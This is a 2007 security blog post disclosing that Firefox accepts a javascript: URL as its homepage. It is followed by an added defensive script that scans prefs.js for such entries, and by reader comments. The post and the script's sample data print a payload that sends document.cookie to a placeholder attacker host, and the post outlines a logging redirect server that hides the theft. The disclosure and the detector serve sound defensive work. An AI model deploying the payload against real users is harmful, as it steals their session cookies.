
November 27, 2007

Firefox Homepage JavaScript Execution

Last month Yair Amit wrote a post about the wild behavior of Internet Explorer's Favorites. Now it's Firefox's turn in the spotlight, as I noticed a feature which misbehaves: Firefox (tested on version 2.0.0.9) permits you to set inline JavaScript as the homepage.

The problem inherent in this is that the installed script is executed in the context of the last visited URL, giving an attacker the opportunity to access the domain of the last visited webpage.

For example, the attacker can run a specially crafted HTTP server which logs all incoming requests, and sends an HTTP Redirect reply that contains the victim's real homepage URL.

The attacker must then somehow convince the victim to change his homepage to:

javascript:location.href='http://<ATTACKER_IP>/'+document.cookie

When the user clicks on the homepage button, he will be redirected to his original homepage, without noticing that his cookies have been stolen!

Although this is not an invisible attack, nor a very effective one (how often do you click on the Homepage button?), its strength is that it is persistent. Most people do not change their homepage frequently, so once the user has been lured into changing his homepage, months may pass before he discovers that his cookies have been stolen.

It should be mentioned that IE7 rejects inline JavaScripts in the homepage field, thus blocking this kind of attack.

Now it is Yair's turn to find a new vulnerability in Internet Explorer :)
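A defender-side check for the condition described in this post, as an added example that is not part of the original post: it parses the text of a Firefox prefs.js (the sample below is constructed) and flags browser.startup.homepage entries that use the javascript: scheme. The function names are hypothetical, and flagging data: as well is an assumption beyond what the post demonstrates.

```javascript
// Added example: audit Firefox preferences for script-bearing homepage entries.
// SAMPLE_PREFS is constructed; <ATTACKER_IP> is the placeholder used in the post.
const SAMPLE_PREFS = [
  '// Mozilla User Preferences',
  'user_pref("browser.startup.page", 1);',
  'user_pref("browser.startup.homepage", "http://www.example.com/|  JavaScript:location.href=\'http://<ATTACKER_IP>/\'+document.cookie");',
].join('\n');

// javascript: is the scheme the post demonstrates; data: is included as an
// assumption about other schemes that carry inline content.
const RISKY_SCHEMES = new Set(['javascript', 'data']);

// URL parsers drop leading whitespace and embedded tab/newline characters and
// compare the scheme case-insensitively, so normalise the same way first.
function schemeOf(url) {
  const cleaned = url.replace(/[\t\r\n]/g, '').replace(/^[\u0000-\u0020]+/, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// Return the string value of a user_pref("name", "value"); line, or null.
function readPref(prefsText, name) {
  for (const line of prefsText.split(/\r?\n/)) {
    const m = /^\s*user_pref\("([^"]+)",\s*"((?:[^"\\]|\\.)*)"\);/.exec(line);
    if (m && m[1] === name) return m[2].replace(/\\(.)/g, '$1');
  }
  return null;
}

// Firefox keeps multiple homepages in one pref, separated by "|"; check each.
function auditHomepage(prefsText) {
  const value = readPref(prefsText, 'browser.startup.homepage');
  if (value === null) return [];
  return value.split('|')
    .map((entry) => ({ entry: entry.trim(), scheme: schemeOf(entry) }))
    .filter((e) => RISKY_SCHEMES.has(e.scheme));
}

for (const f of auditHomepage(SAMPLE_PREFS)) {
  console.log(`suspicious homepage entry (${f.scheme}:): ${f.entry}`);
}
```
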

Comments

"how often do you click on the Homepage button?"

About as often as I need to visit about:blank (ie: never).

""how often do you click on the Homepage button?"

About as often as I need to visit about:blank (ie: never)."

While mine's also about:blank and I removed the Homepage button from toolbar, I press Alt-Home more often than chaining Ctrl-T, Ctrl-Tab (set to last focused), Ctrl-W.

Well, after reading this I was surprised about the topic. I figured a lot of people in the IT sector would be like you and me. But it seems the about:blank people are the minority. I posted on some forums and the vast majority have a set of bookmarks or a search engine as their homepage (home button URL) and actually use it. This concept boggles my mind (we're even talking about Firefox and other non-IE users). Personally, if I need to search I hit alt+d (address bar) and tab over to the search field in FF. As for bookmarks, I keep my daily visits on the linkbar and file everything else as actual bookmarks.

Google is my Homepage, and I'm proud of it!
